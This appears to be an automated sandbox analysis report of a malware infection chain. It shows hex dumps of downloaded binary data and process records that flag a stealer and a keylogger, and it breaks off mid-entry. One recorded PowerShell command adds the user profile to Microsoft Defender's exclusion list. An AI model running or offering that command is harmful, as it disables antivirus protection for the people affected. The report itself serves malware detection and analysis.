                                                                                                                                                                                                                                                                                                              2024-12-22 22:53:39 UTC16384INData Raw: a8 63 04 da f3 ff 3e 78 53 59 c4 0b 62 c2 4d d1 f6 0d a0 c2 a6 9b 15 71 bf 81 80 3d b6 e5 5c 5c 7d 47 ef 67 35 38 41 08 3a 8a df 9a a0 f3 40 7b c5 40 1d 72 62 45 76 2d 07 d5 c6 04 48 85 59 63 98 7d f9 54 d0 b0 52 0b 2e 1d af 57 40 7c 63 07 61 c0 f7 50 1a ac 37 3c ff 26 d3 10 8f 30 83 ae 6d 0c 12 08 b9 2e 84 9c 1c ce d3 aa ed 3f db 77 5a 2b b9 ae dc b9 a2 f8 3e fb 06 c6 6a cd 69 42 a7 4d 95 ad 4e 85 2d 44 ed 9a 84 e9 e8 dd 66 5d bc 35 24 e5 07 58 73 8f 9c 00 2b fc 2f 41 b7 50 93 35 25 a2 60 30 7e bd bc 6f 9a 1f 84 57 aa eb f2 ee c6 2e 1f bf e3 5f 3f 76 9f f6 1b 93 60 dd 9a 11 7a a3 2c 63 25 ad 59 87 55 b8 dd 3c 86 f4 b5 1a 30 18 fd 81 b9 b6 fd fc c2 4c a7 fb 64 16 10 eb ce 14 2d f4 60 9e 75 ee c0 80 c8 14 3c 83 4e 47 0c de 96 8a 4b ee 07 46 2b 94 40 59 5d
                                                                                                                                                                                                                                                                                                              Data Ascii: c>xSYbMq=\\}Gg58A:@{@rbEv-HYc}TR.W@|caP7<&0m.?wZ+>jiBMN-Df]5$Xs+/AP5%`0~oW._?v`z,c%YU<0Ld-`u<NGKF+@Y]
                                                                                                                                                                                                                                                                                                              2024-12-22 22:53:39 UTC300INData Raw: fb e8 42 ce e9 c4 ed 62 c6 17 1f 8c ec af 52 ac b8 8f 48 06 b4 8a 17 1b 77 21 07 75 4e 1b 40 5b 70 48 76 a6 7b 25 ad 7d c1 2c 17 8c a6 54 f2 6a 62 0a cc 35 73 b9 41 a2 34 55 60 92 69 24 de 55 99 fb 5e 19 7f 8f 40 59 8e 5d 50 cb fc aa e5 bc c0 9b 74 27 33 24 f5 c0 6e 5c f7 37 ee a1 e9 13 be 35 31 47 13 f3 ff b6 b6 08 1f 38 1b ed 8b a7 83 fc 02 e4 c1 8c 6a c5 2f cd a0 e4 93 72 4d bb 3a a8 77 fa b6 cf 86 aa 9f 77 9d ae 2d ab 0f 21 f0 ec 19 6e 5e 9f 3f 3e e9 d2 56 52 30 bf d6 dc 80 85 86 41 8f f4 44 59 17 c7 44 03 79 37 25 ab 4e 07 f5 bf d8 4c a0 b0 55 e3 8b c0 95 b9 27 9f 4c 7c 25 75 2b 5e 7c 8e 3e 50 3d 63 43 e7 28 b6 de 9f ae 19 58 f5 e9 b1 70 ad da 55 19 1c 05 58 c8 9b 49 5b 29 65 5f 48 8f fb 5b 83 8e fc dd 16 60 d9 4b a1 3b 25 01 78 6b df b8 79 8c 28 e9
                                                                                                                                                                                                                                                                                                              Data Ascii: BbRHw!uN@[pHv{%},Tjb5sA4U`i$U^@Y]Pt'3$n\751G8j/rM:ww-!n^?>VR0ADYDy7%NLU'L|%u+^|>P=cC(XpUXI[)e_H[`K;%xky(
                                                                                                                                                                                                                                                                                                              2024-12-22 22:53:39 UTC16384INData Raw: 97 ef 69 29 50 f3 bb 1d 6d 14 e4 01 68 c6 fe ac fa e8 fa 74 4b 82 a1 c7 26 36 11 44 6d 69 1e 72 46 72 25 f6 86 25 c4 79 c9 1e 62 d6 d0 10 fc d9 c1 1c 16 61 ec db 4c d1 a3 d7 b2 7f ec 7a b9 49 cb de 23 8d 36 99 3c ab 30 76 72 0c 05 d3 1f 1c b4 e2 ea 7f 02 f6 bf 65 c0 8c 9a 54 96 d2 da 06 f9 96 08 82 fa 60 0d 59 eb 8e e9 49 9c bf 8f 4d e5 46 9f e5 07 cf 5a c0 a8 70 6f b2 2f 52 9e e3 62 26 08 55 75 06 00 48 9a a6 e1 ce 42 a9 02 f2 fb 59 30 5a d1 1c 58 7b 7a 79 3f a9 35 f9 29 d0 9c b7 60 f8 11 41 97 28 57 ed f6 ac bf aa a6 40 12 7c 4c ee d8 42 3d 16 ee 62 2c 31 7c f6 89 36 d1 ed 3c e8 ee 7d 80 fa 72 50 e5 82 e6 b6 12 a9 8f 72 26 e0 37 7b 55 0b 42 35 27 af b1 fa e5 fc 3e 11 5a fa b8 7f a8 60 eb 02 51 61 fe 7c d1 1a e1 0d b6 44 38 31 76 e9 af ca a4 c1 aa 9e 4e
                                                                                                                                                                                                                                                                                                              Data Ascii: i)PmhtK&6DmirFr%%ybaLzI#6<0vreT`YIMFZpo/Rb&UuHBY0ZX{zy?5)`A(W@|LB=b,1|6<}rPr&7{UB5'>Z`Qa|D81vN
                                                                                                                                                                                                                                                                                                              2024-12-22 22:53:39 UTC16384INData Raw: b9 8e 04 bb 9a 11 bf fa 65 db f2 35 86 b9 61 e8 ae cc 7f 60 12 5f 01 10 93 0c 5d 2e 88 c5 da 40 80 47 ae 9a cf 18 52 f8 a6 39 6c b0 78 90 e0 da a6 dc a7 e3 5d 52 8f c2 13 5c b5 a8 1c 6f 76 1d 50 da 72 6d c8 ac b5 52 13 08 1d a1 42 30 d7 a4 81 07 48 7a 0e 56 04 c7 39 fd 5a 64 60 ff 1a ee 2e cf 8b b7 ba 5f 5d 44 6a 55 a8 18 b0 db 81 04 22 a4 12 df d7 d9 77 ef 07 32 ab b9 de 0c fd 0f 96 3f 21 fe 89 89 85 70 24 dc 2a e4 1d ba 16 2c 11 50 0b a8 b7 d0 41 44 68 c3 ac eb 94 0e 04 9b 05 f4 08 5b 60 0d 47 dc b6 1e 6d a0 9b 75 c0 53 51 e4 da 04 0c ca 5d 43 60 b4 5a 23 cc fa b7 22 4e b4 a6 f9 a0 fb 79 8f 07 ab f4 86 28 60 17 f3 8e fa 45 96 9f ed 52 63 24 0c 50 9b 97 98 c6 22 9d 65 30 c7 21 87 22 92 b8 c5 55 5e 4c be 16 ce 6a e5 87 39 8c 4a 23 6a ef 95 08 9c 15 c8 0f
                                                                                                                                                                                                                                                                                                              Data Ascii: e5a`_].@GR9lx]R\ovPrmRB0HzV9Zd`._]DjU"w2?!p$*,PADh[`GmuSQ]C`Z#"Ny(`ERc$P"e0!"U^Lj9J#j
                                                                                                                                                                                                                                                                                                              2024-12-22 22:53:39 UTC16384INData Raw: 10 e9 7f b1 47 a1 16 fc ec 0e b1 5a 6a 52 ab 28 1e 9a 18 9c 2e 2d e0 5e bf f9 d2 77 1b 7a e4 c7 49 0b 94 1c 6f 05 4b e3 7b 9c ba 35 69 11 2c 86 e4 5e f7 c6 4f f3 cb 8f d7 5e ad 1a 33 ee ec 78 15 2a fb cf f8 2b 71 b3 d4 0c 60 0d 11 d5 79 cf 6d 8e 36 22 93 b8 3f 28 3b ae d7 1c c3 a3 33 ee ef 4f 1f 2d da 82 99 48 d4 c9 3a 39 cf 5d b8 ac 6d 67 2c e7 12 95 b5 6a a7 46 16 93 14 96 3c 6c ee 58 af 93 70 75 b8 51 78 61 03 f6 c9 56 2b 3f 84 f6 c4 89 12 7f 1a 6c 6c b7 93 8b e7 eb 64 9b cf fc 98 6e 02 5f 08 4b 9b cd 48 fb 76 a4 b7 31 7b 28 9a 9c d7 82 df b8 74 9d 57 ca 09 99 7e aa 83 58 36 22 39 16 cd 11 fa 83 1b 1e e2 d0 ca c0 c0 49 09 97 44 6c 02 5a d0 0e b6 99 2c 2d f0 1b 72 f8 04 6b a7 3d 96 28 7f 1b 35 f9 b6 4f 16 eb 7d 46 e2 4b f5 c7 0b 1d 79 b1 81 a0 1b 3c e1
                                                                                                                                                                                                                                                                                                              Data Ascii: GZjR(.-^wzIoK{5i,^O^3x*+q`ym6"?(;3O-H:9]mg,jF<lXpuQxaV+?lldn_KHv1{(tW~X6"9IDlZ,-rk=(5O}FKy<
                                                                                                                                                                                                                                                                                                              2024-12-22 22:53:39 UTC16384INData Raw: 3d 0a bc aa 6e 2b b2 d4 7f ae 38 50 da 96 49 ef 79 ec 5c 28 51 e1 2a 5f e1 bd 84 76 3a a1 0a 0e 21 a3 76 a2 3b b5 2b ec 36 43 38 e4 8c f6 bf e2 d7 b0 24 05 3e ea 2c f6 4d a1 36 53 e4 e8 f8 45 2d 89 30 7a 83 8a 7d f7 16 97 d4 1f 91 54 be ad dc b7 4e 1f 71 93 02 75 0a 99 ce 41 e2 8c e1 80 3a 8b 12 df 94 df 3e c6 2c 2d 5d ef 0d d6 fe 55 b4 c8 45 8c 19 7a fd f2 a1 55 71 82 37 c7 f3 3d 8b b5 05 6c 25 3e e9 65 c4 45 19 5d 57 4b 61 c4 eb 8a b1 01 84 af 44 85 ec 7b a1 ce 2d 85 95 ab f2 d1 fa a6 64 15 15 df 31 a6 9d ed 22 fe 2f cc 7c 33 8f 45 64 79 a4 b7 ee 05 a8 3f 56 f8 88 f5 b8 42 f9 4a 98 ce 31 ab 0b a5 0c f6 d5 d8 b7 84 9e 31 30 60 d0 d9 d3 48 5d 95 86 bf 8b ea 0c 4c 7e d8 ad 70 92 15 93 02 7f 44 ab d6 ad cd ac 35 84 a7 97 e8 ed 5d 96 c9 11 ca b2 c2 42 18 d1
                                                                                                                                                                                                                                                                                                              Data Ascii: =n+8PIy\(Q*_v:!v;+6C8$>,M6SE-0z}TNquA:>,-]UEzUq7=l%>eE]WKaD{-d1"/|3Edy?VBJ110`H]L~pD5]B
                                                                                                                                                                                                                                                                                                              2024-12-22 22:53:39 UTC16384INData Raw: 60 d2 e5 55 6f f9 ee 6c 5f 2f 36 04 25 8c cc c3 18 4e 18 30 31 46 06 ec ee 3a d5 0e b6 64 94 e8 ea 31 3f ff 9f 9c de 0d 12 e1 6a 31 ea 25 03 e4 89 40 c8 23 6b b8 00 53 08 3c 03 e1 3a db d3 8a 4b 18 5b 52 20 da de c8 69 bc ef 7c a9 18 61 a2 03 4f 71 5f 8f 01 5c 79 eb e2 88 64 06 83 76 5e 97 86 72 95 66 7d de 8c bc de 77 d9 8c cb 0e 70 00 32 8f 24 85 a2 46 94 1f e9 1a 64 ca c4 1b 88 15 9f 95 10 57 c1 7d e8 38 88 de b4 39 ec 3b cb 8f 33 3b f5 97 41 9d 68 72 9f 77 b8 00 b8 ba ce 19 83 1f 35 36 e8 d5 61 fc 35 77 69 44 42 01 96 9b d0 5c f2 4c 2c 98 0a 68 e3 28 ae b5 89 ce cf 8b 23 7e b0 d7 55 48 b3 df 67 c4 54 98 08 a8 0c 52 d8 c4 14 7b 20 d7 91 61 8e 15 5d d1 97 f8 fe e8 1a d6 69 9c 4f 86 96 fc 43 71 3a 8b 42 15 85 fb df ed 89 ac bb 19 49 eb 50 26 46 15 66 92
                                                                                                                                                                                                                                                                                                              Data Ascii: `Uol_/6%N01F:d1?j1%@#kS<:K[R i|aOq_\ydv^rf}wp2$FdW}89;3;Ahrw56a5wiDB\L,h(#~UHgTR{ a]iOCq:BIP&Ff


                                                                                                                                                                                                                                                                                                              Statistics

                                                                                                                                                                                                                                                                                                              CPU Usage

                                                                                                                                                                                                                                                                                                              Click to jump to process

                                                                                                                                                                                                                                                                                                              Memory Usage

                                                                                                                                                                                                                                                                                                              Click to jump to process

                                                                                                                                                                                                                                                                                                              High Level Behavior Distribution

                                                                                                                                                                                                                                                                                                              Click to dive into process behavior distribution

                                                                                                                                                                                                                                                                                                              Behavior

                                                                                                                                                                                                                                                                                                              Click to jump to process

                                                                                                                                                                                                                                                                                                              System Behavior

                                                                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                                                                              Target ID:0
                                                                                                                                                                                                                                                                                                              Start time:17:53:08
                                                                                                                                                                                                                                                                                                              Start date:22/12/2024
                                                                                                                                                                                                                                                                                                              Path:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                              Commandline:"C:\Users\user\Desktop\Loader.exe"
                                                                                                                                                                                                                                                                                                              Imagebase:0x400000
                                                                                                                                                                                                                                                                                                              File size:96'490'794 bytes
                                                                                                                                                                                                                                                                                                              MD5 hash:031BAFFF0A790EFC6955A90DAFC6D0E1
                                                                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                                                                              Target ID:2
                                                                                                                                                                                                                                                                                                              Start time:17:53:18
                                                                                                                                                                                                                                                                                                              Start date:22/12/2024
                                                                                                                                                                                                                                                                                                              Path:C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\CampaignHardwareLauncher.exe
                                                                                                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                              Commandline:C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\CampaignHardwareLauncher.exe
                                                                                                                                                                                                                                                                                                              Imagebase:0x400000
                                                                                                                                                                                                                                                                                                              File size:113'664 bytes
                                                                                                                                                                                                                                                                                                              MD5 hash:ABE04EC3EDDF9D00B7E948E5404E172C
                                                                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                              Antivirus matches:
                                                                                                                                                                                                                                                                                                              • Detection: 3%, ReversingLabs
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                                                                              Target ID:3
                                                                                                                                                                                                                                                                                                              Start time:17:53:18
                                                                                                                                                                                                                                                                                                              Start date:22/12/2024
                                                                                                                                                                                                                                                                                                              Path:C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\javaw.exe
                                                                                                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                              Commandline:"C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\javaw.exe" -Dfile.encoding=UTF-8 -classpath "ddfrt658\.;ddfrt658\..;ddfrt658\asm-all.jar;ddfrt658\dn-compiled-module.jar;ddfrt658\dn-php-sdk.jar;ddfrt658\gson.jar;ddfrt658\jfoenix.jar;ddfrt658\jphp-app-framework.jar;ddfrt658\jphp-core.jar;ddfrt658\jphp-desktop-ext.jar;ddfrt658\jphp-gui-ext.jar;ddfrt658\jphp-gui-jfoenix-ext.jar;ddfrt658\jphp-json-ext.jar;ddfrt658\jphp-jsoup-ext.jar;ddfrt658\jphp-runtime.jar;ddfrt658\jphp-xml-ext.jar;ddfrt658\jphp-zend-ext.jar;ddfrt658\jphp-zip-ext.jar;ddfrt658\jsoup.jar;ddfrt658\slf4j-api.jar;ddfrt658\slf4j-simple.jar;ddfrt658\zt-zip.jar" org.develnext.jphp.ext.javafx.FXLauncher
                                                                                                                                                                                                                                                                                                              Imagebase:0x740000
                                                                                                                                                                                                                                                                                                              File size:191'552 bytes
                                                                                                                                                                                                                                                                                                              MD5 hash:48C96771106DBDD5D42BBA3772E4B414
                                                                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                              Antivirus matches:
                                                                                                                                                                                                                                                                                                              • Detection: 0%, ReversingLabs
                                                                                                                                                                                                                                                                                                              Reputation:moderate
                                                                                                                                                                                                                                                                                                              Has exited:false

                                                                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                                                                              Target ID:5
                                                                                                                                                                                                                                                                                                              Start time:17:53:22
                                                                                                                                                                                                                                                                                                              Start date:22/12/2024
                                                                                                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c C:\Users\user\AppData\Local\Temp\8b774b6fbd21273c42f034e15d863942.bat
                                                                                                                                                                                                                                                                                                              Imagebase:0x790000
                                                                                                                                                                                                                                                                                                              File size:236'544 bytes
                                                                                                                                                                                                                                                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                                                                              Target ID:6
                                                                                                                                                                                                                                                                                                              Start time:17:53:22
                                                                                                                                                                                                                                                                                                              Start date:22/12/2024
                                                                                                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                                              Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                                                                              Target ID:7
                                                                                                                                                                                                                                                                                                              Start time:17:53:22
                                                                                                                                                                                                                                                                                                              Start date:22/12/2024
                                                                                                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                              Commandline:powershell -inputformat none -outputformat none -NonInteractive -ExecutionPolicy Bypass -Command Add-MpPreference -ExclusionPath $env:USERPROFILE
                                                                                                                                                                                                                                                                                                              Imagebase:0x880000
                                                                                                                                                                                                                                                                                                              File size:433'152 bytes
                                                                                                                                                                                                                                                                                                              MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                                                                              Target ID:9
                                                                                                                                                                                                                                                                                                              Start time:17:53:24
                                                                                                                                                                                                                                                                                                              Start date:22/12/2024
                                                                                                                                                                                                                                                                                                              Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                                                                                                                                                                                                                              Imagebase:0x7ff6ef0c0000
                                                                                                                                                                                                                                                                                                              File size:496'640 bytes
                                                                                                                                                                                                                                                                                                              MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                                                                              Target ID:10
                                                                                                                                                                                                                                                                                                              Start time:17:53:33
                                                                                                                                                                                                                                                                                                              Start date:22/12/2024
                                                                                                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                              Commandline:explorer C:\Users\user\AppData\Local\Temp\medicalanalysispro\medicalanalysispro.exe
                                                                                                                                                                                                                                                                                                              Imagebase:0xf20000
                                                                                                                                                                                                                                                                                                              File size:4'514'184 bytes
                                                                                                                                                                                                                                                                                                              MD5 hash:DD6597597673F72E10C9DE7901FBA0A8
                                                                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                              Reputation:moderate
                                                                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                                                                              Target ID:11
                                                                                                                                                                                                                                                                                                              Start time:17:53:33
                                                                                                                                                                                                                                                                                                              Start date:22/12/2024
                                                                                                                                                                                                                                                                                                              Path:C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                              Commandline:C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
                                                                                                                                                                                                                                                                                                              Imagebase:0x7ff674740000
                                                                                                                                                                                                                                                                                                              File size:5'141'208 bytes
                                                                                                                                                                                                                                                                                                              MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                                                                                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                                                                              Target ID:12
                                                                                                                                                                                                                                                                                                              Start time:17:53:34
                                                                                                                                                                                                                                                                                                              Start date:22/12/2024
                                                                                                                                                                                                                                                                                                              Path:C:\Users\user\AppData\Local\Temp\medicalanalysispro\medicalanalysispro.exe
                                                                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                              Commandline:"C:\Users\user\AppData\Local\Temp\medicalanalysispro\medicalanalysispro.exe"
                                                                                                                                                                                                                                                                                                              Imagebase:0x7ff7600a0000
                                                                                                                                                                                                                                                                                                              File size:206'336 bytes
                                                                                                                                                                                                                                                                                                              MD5 hash:178A2A89CB76EFEA6DF50CC884991226
                                                                                                                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                                                                              Target ID:13
                                                                                                                                                                                                                                                                                                              Start time:17:53:34
                                                                                                                                                                                                                                                                                                              Start date:22/12/2024
                                                                                                                                                                                                                                                                                                              Path:C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exe
                                                                                                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                              Commandline:C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exe
                                                                                                                                                                                                                                                                                                              Imagebase:0x140000
                                                                                                                                                                                                                                                                                                              File size:93'696 bytes
                                                                                                                                                                                                                                                                                                              MD5 hash:443B43ADCB78164D40C977ABAC54C18E
                                                                                                                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 0000000D.00000002.2831006942.00000000026E7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 0000000D.00000002.2858444058.0000000005940000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                                                                              Target ID:15
                                                                                                                                                                                                                                                                                                              Start time:17:54:24
                                                                                                                                                                                                                                                                                                              Start date:22/12/2024
                                                                                                                                                                                                                                                                                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                              Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                                                                                                                                                                                                                                                                                                              Imagebase:0xd20000
                                                                                                                                                                                                                                                                                                              File size:42'064 bytes
                                                                                                                                                                                                                                                                                                              MD5 hash:5D4073B2EB6D217C19F2B22F21BF8D57
                                                                                                                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 0000000F.00000002.2844728394.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                                                                              Target ID:16
                                                                                                                                                                                                                                                                                                              Start time:17:54:25
                                                                                                                                                                                                                                                                                                              Start date:22/12/2024
                                                                                                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                              Commandline:"C:\Windows\System32\svchost.exe"
                                                                                                                                                                                                                                                                                                              Imagebase:0xae0000
                                                                                                                                                                                                                                                                                                              File size:46'504 bytes
                                                                                                                                                                                                                                                                                                              MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                                                                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000010.00000003.2844637112.0000000004D10000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 00000010.00000003.2840379092.00000000003E0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000010.00000003.2844199525.0000000004AF0000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 00000010.00000002.2935727529.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                                                                              Target ID:19
                                                                                                                                                                                                                                                                                                              Start time:17:54:25
                                                                                                                                                                                                                                                                                                              Start date:22/12/2024
                                                                                                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                              Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 3148 -s 348
                                                                                                                                                                                                                                                                                                              Imagebase:0x9a0000
                                                                                                                                                                                                                                                                                                              File size:483'680 bytes
                                                                                                                                                                                                                                                                                                              MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                                                                              Target ID:20
                                                                                                                                                                                                                                                                                                              Start time:17:54:27
                                                                                                                                                                                                                                                                                                              Start date:22/12/2024
                                                                                                                                                                                                                                                                                                              Path:C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exe
                                                                                                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                              Commandline:C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exe
                                                                                                                                                                                                                                                                                                              Imagebase:0xfb0000
                                                                                                                                                                                                                                                                                                              File size:25'600 bytes
                                                                                                                                                                                                                                                                                                              MD5 hash:2DBC39DCE4C3B66019E84A28A342EAD0
                                                                                                                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                                                                              Target ID:21
                                                                                                                                                                                                                                                                                                              Start time:17:54:32
                                                                                                                                                                                                                                                                                                              Start date:22/12/2024
